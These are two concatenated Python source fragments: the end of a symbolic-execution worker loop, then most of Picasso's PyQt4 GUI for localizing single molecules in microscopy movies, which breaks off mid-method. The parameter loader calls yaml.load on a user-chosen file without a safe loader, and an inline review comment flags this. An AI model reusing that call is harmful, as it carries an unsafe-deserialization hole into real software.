self.generate_testcase(current_state, str(e))
current_state = None
except SolverException as e:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_exc:"
traceback.print_exc()
#Notify this state is done
self.will_terminate_state(current_state, current_state_id, e)
if solver.check(current_state.constraints):
self.generate_testcase(current_state, "Solver failed" + str(e))
current_state = None
except (Exception, AssertionError) as e:
import traceback
trace = traceback.format_exc()
logger.error("Exception: %s\n%s", str(e), trace)
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Exception')
current_state = None
logger.setState(None)
assert current_state is None
#notify siblings we are about to stop this run
self._stop_run()
#Notify this worker is done (not sure it's needed)
self.will_finish_run()
|
#!/usr/bin/env python
"""
gui/localize
~~~~~~~~~~~~~~~~~~~~
Graphical user interface for localizing single molecules
:author: Joerg Schnitzbauer, 2015
"""
import os.path
import sys
import yaml
from PyQt4 import QtCore, QtGui
import time
import numpy as np
import traceback
from concurrent.futures import wait
_this_file = os.path.abspath(__file__)
_this_directory = os.path.dirname(_this_file)
_parent_directory = os.path.dirname(_this_directory)
sys.path.insert(0, _parent_directory) # We want to use the local picasso instead the system-wide
from picasso import io, localize
# 256-entry grayscale palette used when rendering camera frames as 8-bit
# indexed images.
CMAP_GRAYSCALE = [QtGui.qRgb(_, _, _) for _ in range(256)]
# Default spot-identification parameters. NOTE(review): 'Minimum LGM'
# appears to be a minimum local-gradient-magnitude threshold — confirm
# against picasso.localize before documenting further.
DEFAULT_PARAMETERS = {'Box Size': 7, 'Minimum LGM': 5000}
class RubberBand(QtGui.QRubberBand):
    """Rectangle rubber band painted with an explicit 1px blue outline."""

    def __init__(self, parent):
        super().__init__(QtGui.QRubberBand.Rectangle, parent)

    def paintEvent(self, event):
        blue_pen = QtGui.QPen(QtGui.QColor(QtCore.Qt.blue))
        painter = QtGui.QPainter(self)
        painter.setPen(blue_pen)
        outline = event.rect()
        # Shrink by one pixel so the outline stays inside the widget.
        outline.setWidth(outline.width() - 1)
        outline.setHeight(outline.height() - 1)
        painter.drawRect(outline)
class View(QtGui.QGraphicsView):
    """ The central widget which shows `Scene` objects of individual frames.

    Left-drag selects a rectangular ROI (shown with a rubber band);
    right-drag pans; the mouse wheel zooms.
    """
    def __init__(self, window):
        super().__init__(window)
        self.window = window
        self.setAcceptDrops(True)
        # True while the right mouse button is held down for panning.
        self.pan = False
        self.hscrollbar = self.horizontalScrollBar()
        self.vscrollbar = self.verticalScrollBar()
        self.rubberband = RubberBand(self)
        # ROI as [[y0, x0], [y1, x1]] in scene coordinates, or None.
        self.roi = None
    def mousePressEvent(self, event):
        # Left button starts an ROI selection; right button starts panning.
        if event.button() == QtCore.Qt.LeftButton:
            self.roi_origin = QtCore.QPoint(event.pos())
            self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, QtCore.QSize()))
            self.rubberband.show()
        elif event.button() == QtCore.Qt.RightButton:
            self.pan = True
            self.pan_start_x = event.x()
            self.pan_start_y = event.y()
            self.setCursor(QtCore.Qt.ClosedHandCursor)
            event.accept()
        else:
            event.ignore()
    def mouseMoveEvent(self, event):
        if event.buttons() == QtCore.Qt.LeftButton:
            self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, event.pos()))
        if self.pan:
            # Scroll opposite to the cursor movement so the image follows the drag.
            self.hscrollbar.setValue(self.hscrollbar.value() - event.x() + self.pan_start_x)
            self.vscrollbar.setValue(self.vscrollbar.value() - event.y() + self.pan_start_y)
            self.pan_start_x = event.x()
            self.pan_start_y = event.y()
            event.accept()
        else:
            event.ignore()
    def mouseReleaseEvent(self, event):
        if event.button() == QtCore.Qt.LeftButton:
            self.roi_end = QtCore.QPoint(event.pos())
            dx = abs(self.roi_end.x() - self.roi_origin.x())
            dy = abs(self.roi_end.y() - self.roi_origin.y())
            # Drags smaller than 10 px in either direction clear the ROI.
            if dx < 10 or dy < 10:
                self.roi = None
                self.rubberband.hide()
            else:
                roi_points = (self.mapToScene(self.roi_origin), self.mapToScene(self.roi_end))
                # Stored as [y, x] pairs, matching the (frame, y, x) movie layout.
                self.roi = list([[int(_.y()), int(_.x())] for _ in roi_points])
            self.window.draw_frame()
        elif event.button() == QtCore.Qt.RightButton:
            self.pan = False
            self.setCursor(QtCore.Qt.ArrowCursor)
            event.accept()
        else:
            event.ignore()
    def wheelEvent(self, event):
        """ Implements zooming with the mouse wheel """
        scale = 1.008 ** (-event.delta())
        self.scale(scale, scale)
class Scene(QtGui.QGraphicsScene):
    """ Scenes render individual frames and can be displayed in a `View` widget.

    Supports drag-and-drop of .raw movies and .yaml parameter files.
    """
    def __init__(self, window, parent=None):
        super().__init__(parent)
        self.window = window
        # Keep accepting the drag while the cursor moves over the scene.
        self.dragMoveEvent = self.dragEnterEvent
    def path_from_drop(self, event):
        """Return (path, extension) of the first URL carried by a drop event."""
        url = event.mimeData().urls()[0]
        path = url.toLocalFile()
        base, extension = os.path.splitext(path)
        return path, extension
    def drop_has_valid_url(self, event):
        """Return True if the drop carries a local .raw or .yaml file URL."""
        if not event.mimeData().hasUrls():
            return False
        path, extension = self.path_from_drop(event)
        return extension.lower() in ['.raw', '.yaml']
    def dragEnterEvent(self, event):
        if self.drop_has_valid_url(event):
            event.accept()
        else:
            event.ignore()
    def dropEvent(self, event):
        """ Loads raw movies or yaml parameters when dropped into the scene """
        path, extension = self.path_from_drop(event)
        # Compare case-insensitively: drop_has_valid_url lower-cases the
        # extension, so e.g. 'MOVIE.RAW' is accepted on drag-enter and must
        # be handled here as well (previously it was silently ignored).
        extension = extension.lower()
        if extension == '.raw':
            self.window.open(path)
        elif extension == '.yaml':
            self.window.load_parameters(path)
class FitMarker(QtGui.QGraphicsItemGroup):
    """Green 'X' marker drawn at a fitted localization position."""

    def __init__(self, x, y, size, parent=None):
        super().__init__(parent)
        half = size / 2
        pen = QtGui.QPen(QtGui.QColor(0, 255, 0))
        # Two crossing diagonals of a size-by-size square centered on (x, y).
        for x1, y1, x2, y2 in ((x - half, y - half, x + half, y + half),
                               (x - half, y + half, x + half, y - half)):
            line = QtGui.QGraphicsLineItem(x1, y1, x2, y2)
            line.setPen(pen)
            self.addToGroup(line)
class OddSpinBox(QtGui.QSpinBox):
    """A spin box restricted to odd values.

    Arrow/keyboard steps move by two; values typed in directly are bumped
    up to the next odd number.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.setSingleStep(2)
        self.valueChanged.connect(self.on_value_changed)

    def on_value_changed(self, value):
        if not value % 2:
            self.setValue(value + 1)
class ParametersDialog(QtGui.QDialog):
    """ The dialog showing analysis parameters.

    Hosts two groups: 'Identification' (box size and Minimum LGM threshold,
    with a slider whose range is user-adjustable) and 'Fitting' (camera,
    EM gain, readout mode, pre-amp gain and excitation wavelength, populated
    from localize.CONFIG['Cameras']).
    """
    def __init__(self, parent=None):
        super().__init__(parent)
        self.window = parent
        self.setWindowTitle('Parameters')
        self.resize(300, 0)
        self.setModal(False)
        vbox = QtGui.QVBoxLayout(self)
        identification_groupbox = QtGui.QGroupBox('Identification')
        vbox.addWidget(identification_groupbox)
        identification_grid = QtGui.QGridLayout(identification_groupbox)
        # Box Size
        identification_grid.addWidget(QtGui.QLabel('Box side length:'), 0, 0)
        self.box_spinbox = OddSpinBox()
        self.box_spinbox.setValue(DEFAULT_PARAMETERS['Box Size'])
        self.box_spinbox.valueChanged.connect(self.on_box_changed)
        identification_grid.addWidget(self.box_spinbox, 0, 1)
        # Minimum LGM
        identification_grid.addWidget(QtGui.QLabel('Minimum LGM:'), 1, 0)
        self.mlgm_spinbox = QtGui.QSpinBox()
        self.mlgm_spinbox.setRange(0, 999999)
        self.mlgm_spinbox.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
        # Only emit valueChanged when editing is finished, not per keystroke.
        self.mlgm_spinbox.setKeyboardTracking(False)
        self.mlgm_spinbox.valueChanged.connect(self.on_mlgm_spinbox_changed)
        identification_grid.addWidget(self.mlgm_spinbox, 1, 1)
        # Slider
        self.mlgm_slider = QtGui.QSlider()
        self.mlgm_slider.setOrientation(QtCore.Qt.Horizontal)
        self.mlgm_slider.setRange(0, 10000)
        self.mlgm_slider.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
        self.mlgm_slider.setSingleStep(1)
        self.mlgm_slider.setPageStep(20)
        self.mlgm_slider.valueChanged.connect(self.on_mlgm_slider_changed)
        identification_grid.addWidget(self.mlgm_slider, 2, 0, 1, 2)
        hbox = QtGui.QHBoxLayout()
        identification_grid.addLayout(hbox, 3, 0, 1, 2)
        # Min SpinBox
        self.mlgm_min_spinbox = QtGui.QSpinBox()
        self.mlgm_min_spinbox.setRange(0, 999999)
        self.mlgm_min_spinbox.setKeyboardTracking(False)
        self.mlgm_min_spinbox.setValue(0)
        self.mlgm_min_spinbox.valueChanged.connect(self.on_mlgm_min_changed)
        hbox.addWidget(self.mlgm_min_spinbox)
        hbox.addStretch(1)
        # Max SpinBox
        self.mlgm_max_spinbox = QtGui.QSpinBox()
        self.mlgm_max_spinbox.setKeyboardTracking(False)
        self.mlgm_max_spinbox.setRange(0, 999999)
        self.mlgm_max_spinbox.setValue(10000)
        self.mlgm_max_spinbox.valueChanged.connect(self.on_mlgm_max_changed)
        hbox.addWidget(self.mlgm_max_spinbox)
        self.preview_checkbox = QtGui.QCheckBox('Preview')
        self.preview_checkbox.setTristate(False)
        # self.preview_checkbox.setChecked(True)
        self.preview_checkbox.stateChanged.connect(self.on_preview_changed)
        identification_grid.addWidget(self.preview_checkbox, 4, 0)
        fit_groupbox = QtGui.QGroupBox('Fitting')
        vbox.addWidget(fit_groupbox)
        fit_grid = QtGui.QGridLayout(fit_groupbox)
        # Camera
        fit_grid.addWidget(QtGui.QLabel('Camera:'), 0, 0)
        self.camera_combo = QtGui.QComboBox()
        self.camera_combo.currentIndexChanged.connect(self.on_camera_changed)
        fit_grid.addWidget(self.camera_combo, 0, 1)
        self.em_checkbox = QtGui.QCheckBox('Electron Multiplying')
        self.em_checkbox.toggled.connect(self.update_readmodes)
        fit_grid.addWidget(self.em_checkbox, 1, 1)
        fit_grid.addWidget(QtGui.QLabel('EM Real Gain:'), 2, 0)
        self.gain_spinbox = QtGui.QSpinBox()
        self.gain_spinbox.setRange(1, 1000)
        fit_grid.addWidget(self.gain_spinbox, 2, 1)
        fit_grid.addWidget(QtGui.QLabel('Readout Mode:'), 3, 0)
        self.readmode_combo = QtGui.QComboBox()
        self.readmode_combo.currentIndexChanged.connect(self.update_preamps)
        fit_grid.addWidget(self.readmode_combo, 3, 1)
        fit_grid.addWidget(QtGui.QLabel('Pre-Amp Gain:'), 4, 0)
        self.preamp_combo = QtGui.QComboBox()
        fit_grid.addWidget(self.preamp_combo, 4, 1)
        fit_grid.addWidget(QtGui.QLabel('Excitation Wavelength:'), 5, 0)
        self.excitation_combo = QtGui.QComboBox()
        fit_grid.addWidget(self.excitation_combo, 5, 1)
        # Populate last so the connected on_camera_changed fires with all
        # dependent widgets already constructed.
        self.camera_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'].keys())))
    def on_camera_changed(self, index):
        """Refresh readout modes and excitation wavelengths for the camera."""
        self.update_readmodes(index)
        self.excitation_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            wavelengths = sorted(list(localize.CONFIG['Cameras'][camera]['Quantum Efficiency'].keys()))
            wavelengths = [str(_) for _ in wavelengths]
            self.excitation_combo.addItems([''] + wavelengths)
    def update_readmodes(self, index):
        """Repopulate readout modes; only EMCCD sensors define any."""
        self.readmode_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
                em = self.em_checkbox.isChecked()
                self.readmode_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'][camera]['Sensitivity'][em].keys())))
    def update_preamps(self, index):
        """Repopulate pre-amp gains (1-based labels) for the current readout mode."""
        self.preamp_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
                em = self.em_checkbox.isChecked()
                readmode = self.readmode_combo.currentText()
                if readmode:
                    preamps = range(len(localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode]))
                    preamps = [''] + [str(_ + 1) for _ in list(preamps)]
                    self.preamp_combo.addItems(preamps)
    def on_box_changed(self, value):
        self.window.on_parameters_changed()
    def on_mlgm_spinbox_changed(self, value):
        """Push a typed threshold to the slider, widening its range if needed."""
        if value < self.mlgm_slider.minimum():
            self.mlgm_min_spinbox.setValue(value)
        if value > self.mlgm_slider.maximum():
            self.mlgm_max_spinbox.setValue(value)
        self.mlgm_slider.setValue(value)
    def on_mlgm_slider_changed(self, value):
        """Mirror the slider into the spinbox; redraw only in preview mode."""
        self.mlgm_spinbox.setValue(value)
        if self.preview_checkbox.isChecked():
            self.window.on_parameters_changed()
    def on_mlgm_min_changed(self, value):
        self.mlgm_slider.setMinimum(value)
    def on_mlgm_max_changed(self, value):
        self.mlgm_slider.setMaximum(value)
    def on_preview_changed(self, state):
        self.window.draw_frame()
    def set_camera_parameters(self, parameters):
        """Select combo/checkbox states from a movie-info parameters dict.

        Unknown or missing keys leave the corresponding widget at index 0.
        """
        self.camera_combo.setCurrentIndex(0)
        if 'Camera' in parameters:
            camera = parameters['Camera']
            for index in range(self.camera_combo.count()):
                if self.camera_combo.itemText(index) == camera:
                    self.camera_combo.setCurrentIndex(index)
                    break
        if 'Electron Multiplying' in parameters:
            self.em_checkbox.setChecked(parameters['Electron Multiplying'])
            if parameters['Electron Multiplying']:
                if 'EM Real Gain' in parameters:
                    self.gain_spinbox.setValue(parameters['EM Real Gain'])
        self.readmode_combo.setCurrentIndex(0)
        if 'Readout Mode' in parameters:
            for index in range(self.readmode_combo.count()):
                if self.readmode_combo.itemText(index) == parameters['Readout Mode']:
                    self.readmode_combo.setCurrentIndex(index)
                    break
        self.preamp_combo.setCurrentIndex(0)
        if 'Pre-Amp Gain' in parameters:
            for index in range(self.preamp_combo.count()):
                if self.preamp_combo.itemText(index) == str(parameters['Pre-Amp Gain']):
                    self.preamp_combo.setCurrentIndex(index)
                    break
        self.excitation_combo.setCurrentIndex(0)
        if 'Excitation Wavelength' in parameters:
            for index in range(self.excitation_combo.count()):
                if self.excitation_combo.itemText(index) == parameters['Excitation Wavelength']:
                    self.excitation_combo.setCurrentIndex(index)
                    break
    def get_camera_parameters(self):
        """Collect the fitting parameters currently selected in the dialog.

        Raises:
            ValueError: if no excitation wavelength is selected (and,
                implicitly, if the pre-amp gain combo is empty for an EMCCD).
        """
        camera = self.camera_combo.currentText()
        parameters = {'Camera': self.camera_combo.currentText()}
        if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
            parameters['Electron Multiplying'] = self.em_checkbox.isChecked()
            parameters['EM Real Gain'] = self.gain_spinbox.value()
            parameters['Readout Mode'] = self.readmode_combo.currentText()
            parameters['Pre-Amp Gain'] = int(self.preamp_combo.currentText())
        elif localize.CONFIG['Cameras'][camera]['Sensor'] == 'sCMOS':
            pass
        try:
            parameters['Excitation Wavelength'] = int(self.excitation_combo.currentText())
        except ValueError:
            raise ValueError('You must set the wavelength!')
        return parameters
class ContrastDialog(QtGui.QDialog):
    """Dialog controlling display contrast (black/white levels or auto).

    In auto mode the levels track the current frame's min/max; manual edits
    to either spinbox switch auto mode off.
    """
    def __init__(self, window):
        super().__init__(window)
        self.window = window
        self.setWindowTitle('Contrast')
        self.resize(200, 0)
        self.setModal(False)
        grid = QtGui.QGridLayout(self)
        black_label = QtGui.QLabel('Black:')
        grid.addWidget(black_label, 0, 0)
        self.black_spinbox = QtGui.QSpinBox()
        self.black_spinbox.setKeyboardTracking(False)
        self.black_spinbox.setRange(0, 999999)
        self.black_spinbox.valueChanged.connect(self.on_contrast_changed)
        grid.addWidget(self.black_spinbox, 0, 1)
        white_label = QtGui.QLabel('White:')
        grid.addWidget(white_label, 1, 0)
        self.white_spinbox = QtGui.QSpinBox()
        self.white_spinbox.setKeyboardTracking(False)
        self.white_spinbox.setRange(0, 999999)
        self.white_spinbox.valueChanged.connect(self.on_contrast_changed)
        grid.addWidget(self.white_spinbox, 1, 1)
        self.auto_checkbox = QtGui.QCheckBox('Auto')
        self.auto_checkbox.setTristate(False)
        self.auto_checkbox.setChecked(True)
        self.auto_checkbox.stateChanged.connect(self.on_auto_changed)
        grid.addWidget(self.auto_checkbox, 2, 0, 1, 2)
        # Guard flag: True while levels are being set programmatically, so
        # on_contrast_changed does not disable auto mode or redraw.
        self.silent_contrast_change = False
    def change_contrast_silently(self, black, white):
        """Set both levels without triggering the user-edit side effects."""
        self.silent_contrast_change = True
        self.black_spinbox.setValue(black)
        self.white_spinbox.setValue(white)
        self.silent_contrast_change = False
    def on_contrast_changed(self, value):
        # A genuine user edit implies manual contrast: leave auto mode.
        if not self.silent_contrast_change:
            self.auto_checkbox.setChecked(False)
            self.window.draw_frame()
    def on_auto_changed(self, state):
        """Re-enable auto contrast: snap levels to the current frame's range."""
        if state:
            movie = self.window.movie
            frame_number = self.window.current_frame_number
            frame = movie[frame_number]
            self.change_contrast_silently(frame.min(), frame.max())
            self.window.draw_frame()
class Window(QtGui.QMainWindow):
    """ The main window.

    Owns the movie memmap, the identification/fit results and the dialogs,
    and coordinates the background worker threads.
    """
    def __init__(self):
        super().__init__()
        # Init GUI
        self.setWindowTitle('Picasso: Localize')
        this_directory = os.path.dirname(os.path.realpath(__file__))
        icon_path = os.path.join(this_directory, 'localize.ico')
        icon = QtGui.QIcon(icon_path)
        self.setWindowIcon(icon)
        self.resize(768, 768)
        self.parameters_dialog = ParametersDialog(self)
        self.contrast_dialog = ContrastDialog(self)
        self.init_menu_bar()
        self.view = View(self)
        self.setCentralWidget(self.view)
        self.scene = Scene(self)
        self.view.setScene(self.scene)
        self.status_bar = self.statusBar()
        self.status_bar_frame_indicator = QtGui.QLabel()
        self.status_bar.addPermanentWidget(self.status_bar_frame_indicator)
        #: Holds the current movie as a numpy memmap in the format (frame, y, x)
        self.movie = None
        #: A dictionary of analysis parameters used for the last operation
        self.last_identification_info = None
        #: A numpy.recarray of identifcations with fields frame, x and y
        self.identifications = None
        # True once identifications exist for the current parameters.
        self.ready_for_fit = False
        # Fitted localizations (recarray) or None.
        self.locs = None
    def init_menu_bar(self):
        """Build the File / View / Analyze menus and their shortcuts."""
        menu_bar = self.menuBar()
        """ File """
        file_menu = menu_bar.addMenu('File')
        open_action = file_menu.addAction('Open movie')
        open_action.setShortcut('Ctrl+O')
        open_action.triggered.connect(self.open_file_dialog)
        file_menu.addAction(open_action)
        save_action = file_menu.addAction('Save localizations')
        save_action.setShortcut('Ctrl+S')
        save_action.triggered.connect(self.save_locs_dialog)
        file_menu.addAction(save_action)
        file_menu.addSeparator()
        # open_parameters_action = file_menu.addAction('Load parameters')
        # open_parameters_action.setShortcut('Ctrl+Shift+O')
        # open_parameters_action.triggered.connect(self.open_parameters)
        # file_menu.addAction(open_parameters_action)
        # save_parameters_action = file_menu.addAction('Save parameters')
        # save_parameters_action.setShortcut('Ctrl+Shift+S')
        # save_parameters_action.triggered.connect(self.save_parameters)
        # file_menu.addAction(save_parameters_action)
        """ View """
        view_menu = menu_bar.addMenu('View')
        previous_frame_action = view_menu.addAction('Previous frame')
        previous_frame_action.setShortcut('Left')
        previous_frame_action.triggered.connect(self.previous_frame)
        view_menu.addAction(previous_frame_action)
        next_frame_action = view_menu.addAction('Next frame')
        next_frame_action.setShortcut('Right')
        next_frame_action.triggered.connect(self.next_frame)
        view_menu.addAction(next_frame_action)
        view_menu.addSeparator()
        first_frame_action = view_menu.addAction('First frame')
        first_frame_action.setShortcut('Home')
        first_frame_action.triggered.connect(self.first_frame)
        view_menu.addAction(first_frame_action)
        last_frame_action = view_menu.addAction('Last frame')
        last_frame_action.setShortcut('End')
        last_frame_action.triggered.connect(self.last_frame)
        view_menu.addAction(last_frame_action)
        go_to_frame_action = view_menu.addAction('Go to frame')
        go_to_frame_action.setShortcut('Ctrl+G')
        go_to_frame_action.triggered.connect(self.to_frame)
        view_menu.addAction(go_to_frame_action)
        view_menu.addSeparator()
        zoom_in_action = view_menu.addAction('Zoom in')
        zoom_in_action.setShortcuts(['Ctrl++', 'Ctrl+='])
        zoom_in_action.triggered.connect(self.zoom_in)
        view_menu.addAction(zoom_in_action)
        zoom_out_action = view_menu.addAction('Zoom out')
        zoom_out_action.setShortcut('Ctrl+-')
        zoom_out_action.triggered.connect(self.zoom_out)
        view_menu.addAction(zoom_out_action)
        fit_in_view_action = view_menu.addAction('Fit image to window')
        fit_in_view_action.setShortcut('Ctrl+W')
        fit_in_view_action.triggered.connect(self.fit_in_view)
        view_menu.addAction(fit_in_view_action)
        view_menu.addSeparator()
        display_settings_action = view_menu.addAction('Contrast')
        display_settings_action.setShortcut('Ctrl+C')
        display_settings_action.triggered.connect(self.contrast_dialog.show)
        view_menu.addAction(display_settings_action)
        """ Analyze """
        analyze_menu = menu_bar.addMenu('Analyze')
        parameters_action = analyze_menu.addAction('Parameters')
        parameters_action.setShortcut('Ctrl+P')
        parameters_action.triggered.connect(self.parameters_dialog.show)
        analyze_menu.addAction(parameters_action)
        analyze_menu.addSeparator()
        identify_action = analyze_menu.addAction('Identify')
        identify_action.setShortcut('Ctrl+I')
        identify_action.triggered.connect(self.identify)
        analyze_menu.addAction(identify_action)
        fit_action = analyze_menu.addAction('Fit')
        fit_action.setShortcut('Ctrl+F')
        fit_action.triggered.connect(self.fit)
        analyze_menu.addAction(fit_action)
        localize_action = analyze_menu.addAction('Localize (Identify && Fit)')
        localize_action.setShortcut('Ctrl+L')
        localize_action.triggered.connect(self.localize)
        analyze_menu.addAction(localize_action)
    def open_file_dialog(self):
        path = QtGui.QFileDialog.getOpenFileName(self, 'Open image sequence', filter='*.raw')
        if path:
            self.open(path)
    def open(self, path):
        """Load a raw movie (memory-mapped) and reset all analysis state."""
        try:
            self.movie, self.info = io.load_raw(path, memory_map=True)
            self.movie_path = path
            self.identifications = None
            self.locs = None
            self.ready_for_fit = False
            self.set_frame(0)
            self.fit_in_view()
            # Pre-select camera settings from the movie's metadata.
            self.parameters_dialog.set_camera_parameters(self.info[0])
        except FileNotFoundError:
            pass # TODO send a message
    def previous_frame(self):
        if self.movie is not None:
            if self.current_frame_number > 0:
                self.set_frame(self.current_frame_number - 1)
    def next_frame(self):
        if self.movie is not None:
            if self.current_frame_number + 1 < self.info[0]['Frames']:
                self.set_frame(self.current_frame_number + 1)
    def first_frame(self):
        if self.movie is not None:
            self.set_frame(0)
    def last_frame(self):
        if self.movie is not None:
            self.set_frame(self.info[0]['Frames'] - 1)
    def to_frame(self):
        """Ask the user for a 1-based frame number and jump to it."""
        if self.movie is not None:
            frames = self.info[0]['Frames']
            number, ok = QtGui.QInputDialog.getInt(self, 'Go to frame', 'Frame number:', self.current_frame_number+1, 1, frames)
            if ok:
                self.set_frame(number - 1)
    def set_frame(self, number):
        """Make frame `number` (0-based) current, then redraw it."""
        self.current_frame_number = number
        if self.contrast_dialog.auto_checkbox.isChecked():
            black = self.movie[number].min()
            white = self.movie[number].max()
            self.contrast_dialog.change_contrast_silently(black, white)
        self.draw_frame()
        self.status_bar_frame_indicator.setText('{:,}/{:,}'.format(number + 1, self.info[0]['Frames']))
    def draw_frame(self):
        """Render the current frame as an 8-bit grayscale pixmap and overlay
        identifications (boxes) and localizations (crosses)."""
        if self.movie is not None:
            frame = self.movie[self.current_frame_number]
            frame = frame.astype('float32')
            if self.contrast_dialog.auto_checkbox.isChecked():
                # NOTE(review): frame.max() can be 0 for a uniform frame after
                # the min subtraction, which would divide by zero — confirm.
                frame -= frame.min()
                frame /= frame.max()
            else:
                # NOTE(review): scales by the white level alone rather than
                # (white - black) — confirm this contrast mapping is intended.
                frame -= self.contrast_dialog.black_spinbox.value()
                frame /= self.contrast_dialog.white_spinbox.value()
            frame *= 255.0
            frame = np.maximum(frame, 0)
            frame = np.minimum(frame, 255)
            frame = frame.astype('uint8')
            height, width = frame.shape
            image = QtGui.QImage(frame.data, width, height, width, QtGui.QImage.Format_Indexed8)
            image.setColorTable(CMAP_GRAYSCALE)
            pixmap = QtGui.QPixmap.fromImage(image)
            # A fresh Scene per draw discards all previous overlay items.
            self.scene = Scene(self)
            self.scene.addPixmap(pixmap)
            self.view.setScene(self.scene)
            if self.ready_for_fit:
                # Yellow boxes: identifications ready for fitting.
                identifications_frame = self.identifications[self.identifications.frame == self.current_frame_number]
                box = self.last_identification_info['Box Size']
                self.draw_identifications(identifications_frame, box, QtGui.QColor('yellow'))
            else:
                if self.parameters_dialog.preview_checkbox.isChecked():
                    # Red boxes: live preview with the current dialog parameters.
                    identifications_frame = localize.identify_by_frame_number(self.movie,
                                                                              self.parameters,
                                                                              self.current_frame_number,
                                                                              self.view.roi)
                    box = self.parameters['Box Size']
                    self.status_bar.showMessage('Found {:,} spots in current frame.'.format(len(identifications_frame)))
                    self.draw_identifications(identifications_frame, box, QtGui.QColor('red'))
                else:
                    self.status_bar.showMessage('')
            if self.locs is not None:
                locs_frame = self.locs[self.locs.frame == self.current_frame_number]
                for loc in locs_frame:
                    # +0.5 to mark pixel centers rather than pixel corners.
                    self.scene.addItem(FitMarker(loc.x+0.5, loc.y+0.5, 1))
    def draw_identifications(self, identifications, box, color):
        """Draw a `box`-sized outline of `color` around each identification."""
        box_half = int(box / 2)
        for identification in identifications:
            x = identification.x
            y = identification.y
            self.scene.addRect(x - box_half, y - box_half, box, box, color)
    def open_parameters(self):
        path = QtGui.QFileDialog.getOpenFileName(self, 'Open parameters', filter='*.yaml')
        if path:
            self.load_parameters(path)
    def load_parameters(self, path):
        """Load 'Box Size' and 'Minimum LGM' from a YAML file into the dialog."""
        with open(path, 'r') as file:
            # NOTE(review): yaml.load without an explicit Loader can construct
            # arbitrary Python objects from an untrusted file; consider
            # yaml.safe_load for these plain scalar parameters.
            parameters = yaml.load(file)
            self.parameters_dialog.box_spinbox.setValue(parameters['Box Size'])
            self.parameters_dialog.mlgm_spinbox.setValue(parameters['Minimum LGM'])
            self.status_bar.showMessage('Parameter file {} loaded.'.format(path))
    def save_parameters(self):
        path = QtGui.QFileDialog.getSaveFileName(self, 'Save parameters', filter='*.yaml')
        if path:
            with open(path, 'w') as file:
                yaml.dump(self.parameters, file, default_flow_style=False)
    @property
    def parameters(self):
        """Identification parameters as currently set in the dialog."""
        return {'Box Size': self.parameters_dialog.box_spinbox.value(),
                'Minimum LGM': self.parameters_dialog.mlgm_slider.value()}
    def on_parameters_changed(self):
        # Any parameter change invalidates previous fits and identifications.
        self.locs = None
        self.ready_for_fit = False
        self.draw_frame()
    def identify(self, fit_afterwards=False):
        """Start identification in a worker thread; optionally fit when done."""
        if self.movie is not None:
            self.status_bar.showMessage('Preparing identification...')
            self.identificaton_worker = IdentificationWorker(self, fit_afterwards)
            self.identificaton_worker.progressMade.connect(self.on_identify_progress)
            self.identificaton_worker.finished.connect(self.on_identify_finished)
            self.identificaton_worker.start()
    def on_identify_progress(self, frame_number, parameters):
        n_frames = self.info[0]['Frames']
        box = parameters['Box Size']
        mmlg = parameters['Minimum LGM']
        message = 'Identifying in frame {:,}/{:,} (Box Size: {:,}; Minimum LGM: {:,})...'.format(frame_number,
                                                                                                 n_frames,
                                                                                                 box,
                                                                                                 mmlg)
        self.status_bar.showMessage(message)
    def on_identify_finished(self, parameters, roi, identifications, fit_afterwards):
        """Store identification results and mark the movie ready for fitting."""
        if len(identifications):
            self.locs = None
            self.last_identification_info = parameters.copy()
            self.last_identification_info['ROI'] = roi
            n_identifications = len(identifications)
            box = parameters['Box Size']
            mmlg = parameters['Minimum LGM']
            message = 'Identified {:,} spots (Box Size: {:,}; Minimum LGM: {:,}). Ready for fit.'.format(n_identifications,
                                                                                                         box, mmlg)
            self.status_bar.showMessage(message)
            self.identifications = identifications
            self.ready_for_fit = True
            self.draw_frame()
            if fit_afterwards:
                self.fit()
    def fit(self):
        """Fit the stored identifications in a worker thread.

        Builds camera_info (sensitivity, gain, quantum efficiency) from the
        dialog's camera parameters and localize.CONFIG.
        """
        if self.movie is not None and self.ready_for_fit:
            self.status_bar.showMessage('Preparing fit...')
            parameters = self.parameters_dialog.get_camera_parameters()
            camera = parameters['Camera']
            sensor = localize.CONFIG['Cameras'][camera]['Sensor']
            camera_info = {'sensor': sensor}
            if sensor == 'EMCCD':
                em = parameters['Electron Multiplying']
                readmode = parameters['Readout Mode']
                # Combo labels are 1-based; the config list is 0-based.
                preamp = parameters['Pre-Amp Gain'] - 1
                camera_info['sensitivity'] = localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode][preamp]
                if em:
                    camera_info['gain'] = parameters['EM Real Gain']
                else:
                    camera_info['gain'] = 1
            elif sensor == 'sCMOS':
                pass # put calibration here
            excitation = parameters['Excitation Wavelength']
            camera_info['qe'] = localize.CONFIG['Cameras'][camera]['Quantum Efficiency'][excitation]
            self.fit_worker = FitWorker(self.movie, camera_info, self.identifications, self.parameters['Box Size'])
            self.fit_worker.progressMade.connect(self.on_fit_progress)
            self.fit_worker.finished.connect(self.on_fit_finished)
            self.fit_worker.start()
    def on_fit_progress(self, current, n_spots):
        message = 'Fitting spot {:,}/{:,}...'.format(current, n_spots)
        self.status_bar.showMessage(message)
    def on_fit_finished(self, locs):
        """Store localizations, redraw, and auto-save next to the movie."""
        self.status_bar.showMessage('Fitted {:,} spots.'.format(len(locs)))
        self.locs = locs
        self.draw_frame()
        base, ext = os.path.splitext(self.movie_path)
        self.save_locs(base + '_locs.hdf5')
    def fit_in_view(self):
        self.view.fitInView(self.scene.sceneRect(), QtCore.Qt.KeepAspectRatio)
    def zoom_in(self):
        self.view.scale(10 / 7, 10 / 7)
    def zoom_out(self):
